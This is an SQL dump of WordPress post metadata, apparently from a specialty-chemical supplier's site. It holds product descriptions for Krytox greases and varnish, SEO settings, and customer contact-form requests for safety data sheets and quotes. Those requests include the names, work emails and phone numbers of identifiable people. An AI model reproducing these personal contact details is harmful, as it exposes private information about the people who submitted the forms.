INSERT INTO `wp_postmeta` VALUES (24011, 2692, '_field_10', 'ODYSSEUM'); 
INSERT INTO `wp_postmeta` VALUES (24012, 2692, '_field_2', 'contact@odysseum-protect.com'); 
INSERT INTO `wp_postmeta` VALUES (24013, 2692, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (24014, 2692, '_field_3', 'Dear All\r\nI am making orgonites and I am looking for quantities of resin on epoxy or polyester. Can you please let me know the specifications I could use?\r\nLooking forward to hear from you soon,\r\nBest regards\r\nMLahoud'); 
INSERT INTO `wp_postmeta` VALUES (24015, 2692, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24016, 2692, '_sub_id', '2692'); 
INSERT INTO `wp_postmeta` VALUES (24017, 2693, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24018, 2693, '_seq_num', '69'); 
INSERT INTO `wp_postmeta` VALUES (24019, 2693, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24020, 2693, '_field_12', 'Tahir Mahmood'); 
INSERT INTO `wp_postmeta` VALUES (24021, 2693, '_field_13', 'Pakistan International Airlines Corporation'); 
INSERT INTO `wp_postmeta` VALUES (24022, 2693, '_field_18', '106'); 
INSERT INTO `wp_postmeta` VALUES (24023, 2693, '_field_14', 'tahir.mehmood@piac.aero'); 
INSERT INTO `wp_postmeta` VALUES (24024, 2693, '_field_15', '(737) 333-0285'); 
INSERT INTO `wp_postmeta` VALUES (24025, 2693, '_field_16', 'I represents Material Management Section of Engineering &amp; Maintenance of Pakistan Internaional Airlines. I frequently requires Technical Data Sheets / TDS / MSDS of materials. \n\n'); 
INSERT INTO `wp_postmeta` VALUES (24026, 2693, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24027, 2693, '_sub_id', '2693'); 
INSERT INTO `wp_postmeta` VALUES (24028, 2694, '_edit_lock', '1496148611:3'); 
INSERT INTO `wp_postmeta` VALUES (24029, 2694, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (24030, 2694, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (24031, 2694, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24032, 2694, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (24033, 2694, '_yoast_wpseo_focuskeywords', '[{"keyword":"Troubleshooting common molding issue","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (24034, 2694, '_yoast_wpseo_primary_category', '216'); 
INSERT INTO `wp_postmeta` VALUES (24035, 2694, '_yoast_wpseo_focuskw_text_input', 'Mold Release Application Guide'); 
INSERT INTO `wp_postmeta` VALUES (24036, 2694, '_yoast_wpseo_focuskw', 'Mold Release Application Guide'); 
INSERT INTO `wp_postmeta` VALUES (24037, 2694, '_yoast_wpseo_title', 'Mold Release Application Guide | Troubleshooting Common Molding Issue'); 
INSERT INTO `wp_postmeta` VALUES (24038, 2694, '_yoast_wpseo_linkdex', '94'); 
INSERT INTO `wp_postmeta` VALUES (24039, 2707, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24040, 2707, '_seq_num', '70'); 
INSERT INTO `wp_postmeta` VALUES (24041, 2707, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24042, 2707, '_field_12', 'Paige Nowell'); 
INSERT INTO `wp_postmeta` VALUES (24043, 2707, '_field_13', 'PPG Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (24044, 2707, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24045, 2707, '_field_14', 'pnowell@ppg.com'); 
INSERT INTO `wp_postmeta` VALUES (24046, 2707, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (24047, 2707, '_field_16', 'Please send sds for MS-122AD'); 
INSERT INTO `wp_postmeta` VALUES (24048, 2707, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24049, 2707, '_sub_id', '2707'); 
INSERT INTO `wp_postmeta` VALUES (24051, 2716, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24052, 2716, '_seq_num', '71'); 
INSERT INTO `wp_postmeta` VALUES (24053, 2716, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24054, 2716, '_field_12', 'Kenneth Konesky'); 
INSERT INTO `wp_postmeta` VALUES (24055, 2716, '_field_13', 'Rice Lake Weighing Systems'); 
INSERT INTO `wp_postmeta` VALUES (24056, 2716, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24057, 2716, '_field_14', 'kkonesky@ricelake.com'); 
INSERT INTO `wp_postmeta` VALUES (24058, 2716, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (24059, 2716, '_field_16', 'I need a safety datasheet for MS-555 that we use in our rework process.  Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (24060, 2716, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24061, 2716, '_sub_id', '2716'); 
INSERT INTO `wp_postmeta` VALUES (24062, 2717, '_wp_attached_file', '2016/10/shutterstock_293624453.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24063, 2717, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4000;s:6:"height";i:2669;s:4:"file";s:34:"2016/10/shutterstock_293624453.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_293624453-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_293624453-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_293624453-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_293624453-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_293624453-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_293624453-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_293624453-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_293624453-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24064, 2694, '_thumbnail_id', '2717'); 
INSERT INTO `wp_postmeta` VALUES (24068, 2694, '_yoast_wpseo_metadesc', 'Mold Release Application Guide for proper mold preparation and application of mold release agents. Troubleshooting common molding issues.'); 
INSERT INTO `wp_postmeta` VALUES (24081, 2730, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24082, 2730, '_seq_num', '72'); 
INSERT INTO `wp_postmeta` VALUES (24083, 2730, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24084, 2730, '_field_12', 'Paige Nowell'); 
INSERT INTO `wp_postmeta` VALUES (24085, 2730, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (24086, 2730, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24087, 2730, '_field_14', 'pnowell@ppg.com'); 
INSERT INTO `wp_postmeta` VALUES (24088, 2730, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (24089, 2730, '_field_16', 'Please send the sds fir 3140 Curing agent'); 
INSERT INTO `wp_postmeta` VALUES (24090, 2730, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24091, 2730, '_sub_id', '2730'); 
INSERT INTO `wp_postmeta` VALUES (24092, 2731, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24093, 2731, '_seq_num', '63'); 
INSERT INTO `wp_postmeta` VALUES (24094, 2731, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24095, 2731, '_field_1', 'Debra Rudolph'); 
INSERT INTO `wp_postmeta` VALUES (24096, 2731, '_field_10', 'LMI Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (24097, 2731, '_field_2', 'drudolph@lmiaerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (24098, 2731, '_field_8', '(636) 916-2129'); 
INSERT INTO `wp_postmeta` VALUES (24099, 2731, '_field_3', 'Attn: Quality Department –  Miller-Stephenson Chemical, 12261 Foothill Blvd, Sylmar, CA\n\nWe are needing a copy of your current certification for AS9100, AS9120, ISO9001, ISO17025, NADCAP approval, \nor any documents, licenses &amp; certifications applicable to your business.\n\nIf you have a current certificate, please send a copy to my email address at drudolph@lmiaerospace.com.\n\nIf you are not certified, please let me know.\n\nThank You,\nDebra Rudolph\nQuality Assurance Associate\nLMI Aerospace\n\n\n'); 
INSERT INTO `wp_postmeta` VALUES (24100, 2731, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24101, 2731, '_sub_id', '2731'); 
INSERT INTO `wp_postmeta` VALUES (24102, 622, '_wp_old_slug', 'ms-252n'); 
INSERT INTO `wp_postmeta` VALUES (24103, 622, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24104, 622, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24105, 622, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (24106, 622, '_yoast_wpseo_focuskw_text_input', 'Varnish Conformal Coating'); 
INSERT INTO `wp_postmeta` VALUES (24107, 622, '_yoast_wpseo_focuskw', 'Varnish Conformal Coating'); 
INSERT INTO `wp_postmeta` VALUES (24108, 622, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (24109, 622, '_yoast_wpseo_focuskeywords', '[{"keyword":"protective varnish","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (24111, 1749, '_wp_attachment_image_alt', 'Varnish Conformal Coating'); 
INSERT INTO `wp_postmeta` VALUES (24112, 622, '_oembed_b7993677c02dfe74778c33956a95236f', '<blockquote data-secret="zbfmgUhEw2" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/conformal-coating/">Choosing the Right Conformal Coating</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/conformal-coating/embed/#?secret=zbfmgUhEw2" data-secret="zbfmgUhEw2" width="600" height="338" title="&#8220;Choosing the Right Conformal Coating&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (24113, 622, '_oembed_time_b7993677c02dfe74778c33956a95236f', '1477328600'); 
INSERT INTO `wp_postmeta` VALUES (24114, 622, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24115, 622, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24116, 622, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (24117, 622, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24118, 622, '_ywtm_content_tab_description', 'MS-452N Protective Varnish is designed for adverse environmental conditions and offers excellent moisture, oil, chemical, and fungal resistance with good flexibility.  Miller-Stephenson\'s Varnish coating has excellent electrical insulation and moisture/fungus resistant properties making it ideal for use on stators, transformers, field coils, printed circuits, completed electric assemblies, junction boxes and cables.'); 
INSERT INTO `wp_postmeta` VALUES (24119, 622, '_yoast_wpseo_linkdex', '77'); 
INSERT INTO `wp_postmeta` VALUES (24120, 1606, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (24121, 2733, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24122, 2733, '_seq_num', '64'); 
INSERT INTO `wp_postmeta` VALUES (24123, 2733, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24124, 2733, '_field_1', 'Barb Perrine'); 
INSERT INTO `wp_postmeta` VALUES (24125, 2733, '_field_10', 'Bionetics Corp'); 
INSERT INTO `wp_postmeta` VALUES (24126, 2733, '_field_2', 'barbara.perrine.ctr@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (24127, 2733, '_field_8', '(740) 788-5483'); 
INSERT INTO `wp_postmeta` VALUES (24128, 2733, '_field_3', 'Could you please send me a quote for 6 cases (72 cans) of MS-222N Aero Duster.  Thank you!  Barb Perrine  Bionetics Corp.'); 
INSERT INTO `wp_postmeta` VALUES (24129, 2733, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24130, 2733, '_sub_id', '2733'); 
INSERT INTO `wp_postmeta` VALUES (24132, 2735, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24133, 2735, '_seq_num', '73'); 
INSERT INTO `wp_postmeta` VALUES (24134, 2735, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24135, 2735, '_field_12', 'Cynthia Aleman'); 
INSERT INTO `wp_postmeta` VALUES (24136, 2735, '_field_13', 'D&amp;N TEchnologies'); 
INSERT INTO `wp_postmeta` VALUES (24137, 2735, '_field_18', '0850800'); 
INSERT INTO `wp_postmeta` VALUES (24138, 2735, '_field_14', 'cynthia@dandntech.com'); 
INSERT INTO `wp_postmeta` VALUES (24139, 2735, '_field_15', '(210) 225-3194'); 
INSERT INTO `wp_postmeta` VALUES (24140, 2735, '_field_16', 'I need an SDS for grease GPL201'); 
INSERT INTO `wp_postmeta` VALUES (24141, 2735, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24142, 2735, '_sub_id', '2735'); 
INSERT INTO `wp_postmeta` VALUES (24146, 2738, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24147, 2738, '_seq_num', '74'); 
INSERT INTO `wp_postmeta` VALUES (24148, 2738, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24149, 2738, '_field_12', 'Wonjune Hong'); 
INSERT INTO `wp_postmeta` VALUES (24150, 2738, '_field_13', 'Lockheed Martin'); 
INSERT INTO `wp_postmeta` VALUES (24151, 2738, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24152, 2738, '_field_14', 'wonjune.hong@lmco.com'); 
INSERT INTO `wp_postmeta` VALUES (24153, 2738, '_field_15', '(607) 751-2452'); 
INSERT INTO `wp_postmeta` VALUES (24154, 2738, '_field_16', 'To comply with US OSHA requirements,  29 CFR 1910.1200 Hazardous Communication Standard (HCS), may I get SDS of:  1) Industrial Supreme low conductivity antifreeze coolant 2) TFE Release Agent Dry Lubricant MS-122DF?'); 
INSERT INTO `wp_postmeta` VALUES (24155, 2738, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24156, 2738, '_sub_id', '2738'); 
INSERT INTO `wp_postmeta` VALUES (24157, 2739, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24158, 2739, '_seq_num', '75'); 
INSERT INTO `wp_postmeta` VALUES (24159, 2739, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24160, 2739, '_field_12', 'Francisco Pereyra'); 
INSERT INTO `wp_postmeta` VALUES (24161, 2739, '_field_13', 'Johanson Dominicana'); 
INSERT INTO `wp_postmeta` VALUES (24162, 2739, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24163, 2739, '_field_14', 'fpereyra@johansonmfg.com'); 
INSERT INTO `wp_postmeta` VALUES (24164, 2739, '_field_15', '(809) 957-0228'); 
INSERT INTO `wp_postmeta` VALUES (24165, 2739, '_field_16', 'Hi We need the MSDS for the MS-143XD.   Thx'); 
INSERT INTO `wp_postmeta` VALUES (24166, 2739, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24167, 2739, '_sub_id', '2739'); 
INSERT INTO `wp_postmeta` VALUES (24168, 2740, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24169, 2740, '_seq_num', '65'); 
INSERT INTO `wp_postmeta` VALUES (24170, 2740, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24171, 2740, '_field_1', 'Tiffany Chestnut'); 
INSERT INTO `wp_postmeta` VALUES (24172, 2740, '_field_10', 'houston Sigma Technologies'); 
INSERT INTO `wp_postmeta` VALUES (24173, 2740, '_field_2', 'chestnutt@h-st.com'); 
INSERT INTO `wp_postmeta` VALUES (24174, 2740, '_field_8', '(281) 295-5080'); 
INSERT INTO `wp_postmeta` VALUES (24175, 2740, '_field_3', 'Can you tell me if  MS Silicone Conformal Coating MS-460C is still available to purchase?  If not what is it&#039;s replacement\nthank you'); 
INSERT INTO `wp_postmeta` VALUES (24176, 2740, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24177, 2740, '_sub_id', '2740'); 
INSERT INTO `wp_postmeta` VALUES (24178, 2741, '_edit_lock', '1487963715:2'); 
INSERT INTO `wp_postmeta` VALUES (24179, 2741, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (24180, 2742, '_wp_attached_file', '2016/10/shutterstock_353441450.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24181, 2742, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:34:"2016/10/shutterstock_353441450.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_353441450-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_353441450-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_353441450-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_353441450-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_353441450-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_353441450-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_353441450-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_353441450-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24182, 2741, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (24183, 2741, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24184, 2741, '_thumbnail_id', '2742'); 
INSERT INTO `wp_postmeta` VALUES (24185, 2741, '312_default_editor', '<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Property</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Corrugator Krytox 226 FG</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Corrugator Krytox 227 FG</strong></td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>ISO Grade of Base Oil</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">1.95</td>\r\n<td style="text-align: center;">1.95</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %, 30 hr at 99 °C (210 °F)</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">3</td>\r\n</tr>\r\n<tr>\r\n<td>Anticorrosion Additive</td>\r\n<td style="text-align: center;">Sodium Nitrite</td>\r\n<td style="text-align: center;">Sodium Nitrite</td>\r\n</tr>\r\n<tr>\r\n<td>Coefficient of Friction, ASTM D2266</td>\r\n<td style="text-align: center;">0.11</td>\r\n<td style="text-align: center;">0.11</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White, creamy consistency</td>\r\n<td style="text-align: center;">White, creamy consistency</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Base Oil Viscosity, cSt\r\nat 40 °C (104 °F)\r\nat 100 °C (212 °F)</td>\r\n<td style="text-align: center;" width="206">240\r\n25</td>\r\n<td style="text-align: center;" width="206">440\r\n42</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td>Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">–36–260\r\n(–33–500)</td>\r\n<td style="text-align: center;" width="206">–30–288\r\n(–22–550)</td>\r\n</tr>\r\n<tr>\r\n<td>Rust Prevention, ASTM D1743</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Four Ball Wear Scar, ASTM D2266\r\nat 1 hr, 1200 rpm, 107 °C (225 °F), 20 kg</td>\r\n<td style="text-align: center;" width="206">0.4 mm</td>\r\n<td style="text-align: center;">0.4 mm</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Oil Volatility, %, 22 hr at 204 °C (400 °F)\r\nASTM D2595</td>\r\n<td style="text-align: center;">3 max.</td>\r\n<td style="text-align: center;">1 max.</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (24186, 2741, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24187, 2741, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24188, 2741, '719_default_editor', '<ul>\r\n 	<li>NSF H-1 Rated</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (24189, 2741, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24190, 2741, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24191, 2741, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24192, 2741, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24193, 2741, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24194, 2741, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24195, 2741, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24196, 2741, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24197, 2741, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24198, 2741, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24199, 2741, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24200, 2741, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24201, 2741, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24202, 2741, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24203, 2741, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24204, 2741, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24205, 2741, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24206, 2741, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24207, 2741, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24208, 2741, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24209, 2741, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24210, 2741, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24211, 2741, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (24212, 2741, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24213, 2741, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24214, 2741, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24215, 2741, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24216, 2741, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24217, 2741, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24218, 2741, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24219, 2741, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24220, 2741, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24221, 2741, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24222, 2741, '_ywtm_content_tab_description', '<h1><strong>Krytox 226 FG —Setting the Standard for the Corrugating Industry</strong></h1>\r\nSince the 1980s, Krytox 226 FG anticorrosion greases have set the standard for high temperature bearing lubrication in corrugator applications. These products are the same high performance formulation the corrugated industry has trusted for years and, we are pleased to announce, are now certified for <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">incidental food contact.</a>\r\n<h4><strong>NSF Certification Means Safety and Confidence</strong></h4>\r\nTo provide absolute confidence and safety in food-related operations, these products are <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1 food grade certified.</a> Corrugator Krytox 226 FG and Corrugator Krytox 227 FG provide you with peace-of-mind and full confidence that Krytox™ greases are non-toxic, and completely biologically and environmentally inert. Krytox™ corrugator greases are recommended for use in high temperature corrugated equipment applications and manufacture of food packaging materials where an H-1 rated lubricant is required.\r\n<h4><strong>Reliability and Performance for Your Most Demanding Needs</strong></h4>\r\nHigh temperature, extreme pressure Krytox greases excel in the most demanding environments. Their nonoxidizing chemistry and wide temperature range allows them to be used in temperature extremes. Its superior oil film strength reduces friction and abrasive wear to significantly extend equipment life in severe duty applications. Krytox provides excellent water washout resistance, and superior rust and corrosion protection for bearings and components. Krytox is silicone-free, contains no VOC materials or chlorine, and is not hazardous to the atmosphere or ozone layer.\r\n<h4><strong>Chemical and Environmental Compatibility</strong></h4>\r\nWhile Krytox fluorinated greases are non-reactive, its PFPE chemistry is very different from standard hydrocarbon or synthetic chemistries and should never be mixed with non-fluorinated greases.\r\n\r\nKrytox lubricants are inert and will not react with any materials they may come in contact with. The polymeric nature of these products is extremely resistant to moisture, so it stays in place during cleaning. Cleaners and disinfectants, both acidic and caustic types, do not affect them. Steam and high temperatures will not damage them. They do not damage plastic or elastomer seals, or cause corrosion to metals. They are nonflammable and are safe for use in oxygen service.\r\n<h4><strong>Packing the Bearing</strong></h4>\r\nNew bearings should be inspected for damage and cleanliness before use. New unlubricated bearings are often coated with hydrocarbon-based rust preventive oils to protect them during storage. These preservative\r\noils must be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. The preservatives coat the bearing surface to prevent rust and corrosion; but, if not removed prior to use, will prevent the grease from protecting the metal surface. If left on the bearing, the preservative coating can oxidize and harden, and can create debris that will contaminate the grease.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-corrugator-greases/">To learn more about corrugator greases please click here.</a>'); 
INSERT INTO `wp_postmeta` VALUES (24223, 2741, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24224, 2741, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24225, 2741, '_yoast_wpseo_primary_product_cat', '143'); 
INSERT INTO `wp_postmeta` VALUES (24226, 2741, '_yoast_wpseo_focuskw_text_input', 'Krytox 226 FG'); 
